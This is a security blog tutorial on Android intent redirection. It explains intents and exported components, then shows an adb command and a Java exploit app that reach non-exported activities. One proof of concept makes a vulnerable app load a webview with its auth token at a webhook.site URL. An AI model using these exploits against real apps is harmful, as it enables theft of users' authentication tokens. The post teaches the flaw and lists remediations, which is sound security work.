Penetrate the Protected Component in Android

Introduction

Hello guys, in our last blog of the series we discussed basic fundamentals about Android applications and their architecture, if you have not read my previous blog on Understanding Android Basics, then you can read it here.

This blog series aims to help you with understanding the working of Android application components and how can you Access/steal application Internal data while Components are secured.

Prerequisites

Before starting our Blog series, it is assumed that the reader has prior knowledge of Java, and Android basics. It would help with better understanding the components working and their exploitation.

Before Understanding the exploitation phase, let us first understand the intent, its working and usage

INTENT

An intent is a message that can be thought of as a request and is given to either an activity within your own app, an external application, or a built-in Android service.

[Intent] is a messaging object you can use to request an action from another [app component]. Although intents facilitate communication between components in several ways, think of intent as a way for an activity to communicate with the outside Android world.Few key tasks that ki intent might be used for within your apps:

• Take the user to another screen (activity) within your application
• Take the user to a particular URL within the Android web browser
• Take the user to the camera to have them take a picture
• Initiate a call for the user to a given number

Three fundamental use cases

Starting an activity

An Activity represents a single screen. we can launch another activity by passing intent to

Startactivity(intent). or If you want to receive a result from the activity when it finishes, call StartActivityforeesult(). Your activity receives the result as a separate object in your activity’s [onActivityResult()] callback

Starting a service

A Service is a component that performs operations in the background without a user interface. You can start a service to perform a one-time operation (such as downloading a file) by passing an Intent to startService() or bind to the service from another component by passing intent to bindservice().

Delivering a broadcast

A broadcast is a message that any app can receive. The system delivers various broadcasts for system events, such as when the system boots up or the device starts charging. You can deliver a broadcast to other apps by passing an intent to sendBroadcast or sendorderedBroadCast.

Intent Filter

Specifies the types of intents that an activity, service, or broadcast receiver can respond to. An intent filter declares the capabilities of its parent component — what an activity or service can do and what types of broadcasts a receiver can handle. It opens the component to receiving intents of the advertised type. and most of the contents are filtered by <action>, <category>, <data>

Intent is of two types -:

1. Explicit Intent
2. Implicit Intent

Explicit Intent

Explicit Intent is intent in which components are specified as a particular activity or service in your app. You will typically use an explicit intent to start a component in your own app, because you know the class name of the activity or service you want to start.

When the intent object names a specific activity component explicitly, the system immediately starts that component.

For example:

 public void callSecondActivity(View view){  

Intent i = new Intent(getApplicationContext(), SecondActivity.class);  

    i.putExtra("Value1", "Android By Javatpoint");  

     i.putExtra("Value2", "Simple Tutorial");  

   startActivity(i);  

   } 

Implicit Intent

Implicit Intents are those intents in which no component is specified . Android will determine an appropriate activity to handle the intent.

We send Intent messages and android operating system checks and decide which component is registered and to which it should send this intent message and it can be outside of sender application.

Example:

Intent intent = getIntent();   

intent.setAction("com.example.intent_vuln1");   

Intent extraIntent = (Intent)intent.getParcelableExtra("hello");   

if(extraIntent!=null){   

    getIntent().getParcelableExtra("extra_intent"));   

 startActivity(extraIntent); 

Intent-Redirection

Intent redirection is an embedded intent it can be implicit or explicit Intent which is used to move one android component to another component.

Embedding intents in other intents allows developers to create proxy components—components taking the bundled intent and passing it to a method like startActivity to launch another component in the app

This vulnerability occurs when the developer does not retrieve the intent data via filtering. This vulnerability is similar to OpenRedirect for web security.This is risky because an attacker can force the app to launch a non-exported element that cannot be launched directly from another app, or grant the attacker access to the app’s content providers.

CASE 1: Intent Redirection IN Explicit Intent

Let us examine an example. Fragment of the AndroidManifest.xml file

Application have Two Activity MainActivity and MainActivity2 in which MainActivity is defult exported and MainActivity2 is set exported false.

Export restrictions mean the attacker cannot access MainActivity2 directly. A direct call throws a java.lang.SecurityException, due to Permission Denial: MainActivity2 not exported from uid .

Let’s Examine Further Code -: MainActivity

After seeing above picture, it is cleared that an attacker can launch MainActivity2 by passing id Extra in by intent.

 am start -n com.example.intent_vuln/.MainActivity --es "id" "123" 

CASE 2: Intent Redirection by Implicit Intent

let’s Understand this by a practical demonstration:

AndroidMainFest.xml

We have two activities WebActivity exported true and MainActivity3 exported false

Look at the java code WebActvity.java

Let’s look at it step by step as shown in the picture above.

1. Setting the Intent Action
2. Getting the object data with name “hello”

class `Intent` is `Parcelable`, objects belonging to this class can be passed as extra data in another `Intent` 

1. Start the activity along with object passing through it.

Let’s Access!!!

1. Creating an Extra intent Object
2. Setting classname to Non Exported Activity MainActivity3.
3. putting extra with key “url”
4. Creating another Intent Object with name intent
5. setting classname to exported acitivty WebActivity.
6. Putting extra as object name extra as we created above
7. Starting the activity with that object.
8. On running expoit.apk it will the Protected Activity MainActivity3.

Use-Case – Auth token Leakage

let’s Take A real world example with a Use Case – Auth token Leakge.

Let’s examine the Vulnerable Application Code.

AndroidMainfest.xml

.Implcit_redirection

Going over the Implicit intent redirection, it is clear from above picture that any third-party application can send Paraceble intent with name “extra_intent”.

.Protected_A

Application simply extracting the “url ” and load that url in webview with the Token.

Exploit Application

 Intent intent = new Intent();   

 intent.setClassName("com.example.intent_intro","com.example.intent_intro.Protected_A");   

 intent.putExtra("url","https://webhook.site/c3dd45e7-bea0-48ad-bcd5-1419f090dbd2");   

 Intent extra = new Intent();   

  extra.setClassName("com.example.intent_intro","com.example.intent_intro.Implicit_redirection");   

   extra.putExtra("extra_intent",intent);   

   startActivity(extra); 

Remediation

• If the affected app component does not need to receive intents from other apps, then you can make that app component private by setting android:exported=”false” in your Manifest.
• Ensure that the extracted Intent is from a trustworthy source
• Ensure that the to-be-redirected Intent is not harmful

References

• https://portswigger.net/daily-swig/intent-redirection-vulnerabilities-in-popular-android-apps-spotlight-danger-of-dynamic-code-loading-warn-researchers
• https://developer.android.com/guide/topics/manifest/activity-element
• https://developer.android.com/guide/components/intents-filters
• https://developer.android.com/guide/topics/manifest/intent-filter-element
• https://support.google.com/faqs/answer/9267555?hl=en

Like this we can intercept the intent and also access the Protected Component. We will learn more about it in the next blog.

About Payatu

Payatu is a Research Focused, CERT-In impaneled Cybersecurity Consulting company specializing in security assessments of IoT product ecosystem, Web application & Network with a proven track record of securing applications and infrastructure for customers across 20+ countries.

Get in touch with us. Click on the get started button below.